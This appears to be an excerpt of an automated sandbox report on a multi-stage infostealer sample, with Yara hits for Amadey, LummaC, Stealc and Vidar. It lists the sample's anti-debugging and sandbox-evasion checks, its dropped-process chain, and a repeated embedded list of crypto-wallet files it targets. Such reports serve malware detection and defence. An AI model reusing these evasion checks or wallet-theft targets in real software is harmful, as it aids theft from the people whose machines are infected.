Source: skotes.exe, skotes.exe, 0000001D.00000002.2753555341.00000000011B2000.00000040.00000001.01000000.0000000E.sdmp, eDPQZkT.exe, 0000001E.00000002.2750936737.0000000000294000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Web Data.9.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: file.exe, 00000000.00000002.2005702282.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: Web Data.9.dr Binary or memory string: discord.comVMware20,11696494690f
Source: Web Data.9.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Web Data.9.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Web Data.9.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Web Data.9.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000002.2005702282.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005702282.0000000000F73000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001D.00000002.2750756648.0000000000748000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001D.00000002.2750756648.000000000070A000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000002.2753465819.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000002.2753465819.0000000000D25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Web Data.9.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Web Data.9.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Web Data.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Web Data.9.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Web Data.9.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Web Data.9.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Web Data.9.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: skotes.exe, 0000001D.00000002.2750756648.000000000071F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Web Data.9.dr Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.2005702282.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Web Data.9.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Web Data.9.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Web Data.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Web Data.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: eDPQZkT.exe, 0000001E.00000002.2753465819.0000000000D25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: file.exe, 00000000.00000002.2003877523.00000000007C7000.00000040.00000001.01000000.00000003.sdmp, DocumentsCAEHDBAAEC.exe, 00000018.00000002.2035901030.0000000000FF2000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000019.00000002.2062420844.00000000011B2000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000001A.00000002.2075581392.00000000011B2000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000001D.00000002.2753555341.00000000011B2000.00000040.00000001.01000000.0000000E.sdmp, eDPQZkT.exe, 0000001E.00000002.2750936737.0000000000294000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Web Data.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Web Data.9.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Web Data.9.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Code function: 24_2_04D10733 Start: 04D107A0 End: 04D10742 24_2_04D10733
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Code function: 24_2_04D103A3 rdtsc 24_2_04D103A3
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAA5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6CAA5FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA43480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CA43480
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FE652B mov eax, dword ptr fs:[00000030h] 29_2_00FE652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FEA302 mov eax, dword ptr fs:[00000030h] 29_2_00FEA302
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA7B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CA7B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA7B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CA7B1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC2AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CC2AC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 2700, type: MEMORYSTR
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCAEHDBAAEC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsCAEHDBAAEC.exe "C:\Users\user\DocumentsCAEHDBAAEC.exe"
Source: C:\Users\user\DocumentsCAEHDBAAEC.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe "C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe"
Source: file.exe, file.exe, 00000000.00000002.2003877523.00000000007C7000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA7B341 cpuid 0_2_6CA7B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA435A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6CA435A0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 29_2_00FB65E0 LookupAccountNameA, 29_2_00FB65E0
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 24.2.DocumentsCAEHDBAAEC.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.skotes.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.skotes.exe.fb0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.skotes.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000003.1993446233.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2035721983.0000000000DF1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2556448179.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2753217663.0000000000FB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2075502137.0000000000FB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2062300079.0000000000FB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2021553596.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2034975081.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: eDPQZkT.exe PID: 8712, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 00000000.00000003.1499547754.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2001894530.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2005702282.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2700, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 2700, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2005702282.0000000000F87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
